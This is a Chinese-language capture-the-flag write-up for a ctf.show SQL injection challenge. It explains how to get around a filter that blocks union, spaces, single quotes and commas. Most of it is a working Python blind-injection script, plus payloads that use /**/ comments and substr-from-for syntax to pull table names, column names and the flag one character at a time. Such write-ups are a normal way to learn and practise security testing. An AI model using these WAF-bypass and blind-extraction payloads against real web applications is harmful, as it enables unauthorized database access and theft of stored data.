经测试,过滤了union|空格|单引号|逗号

正常情况:

执行语句有回显的情况:

触发waf的情况:

数据库报错的情况:

过滤空格还是很简单的,可以用/**/绕过,关键是过滤了逗号和union,考虑盲注。查阅了资料:

‘ and ascii(substr((select database()),1,1))=xx %23这样的话写个脚本很容易跑出来了,过滤逗号之后可以变成这样

‘ and ascii(substr((select database())from 1 for 1))=xx %23这应该是substring函数的两种用法吧。

脚本如下:

import requests

url='https://b93ee205-6e35-402c-a4c2-e5c8540937d4.chall.ctf.show/index.php'
s=requests.session()

flag=""
for i in range(1,45):
    for j in range(32,128):
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        test = s.get(url=url + '?id=0/**/or/**/' + payload).text
        if 'I asked nothing' in test:
            flag += chr(j)
            print(flag)
            break

运行后得到表名:flag。

payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))

运行后得到flag表的列名:flag。

payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))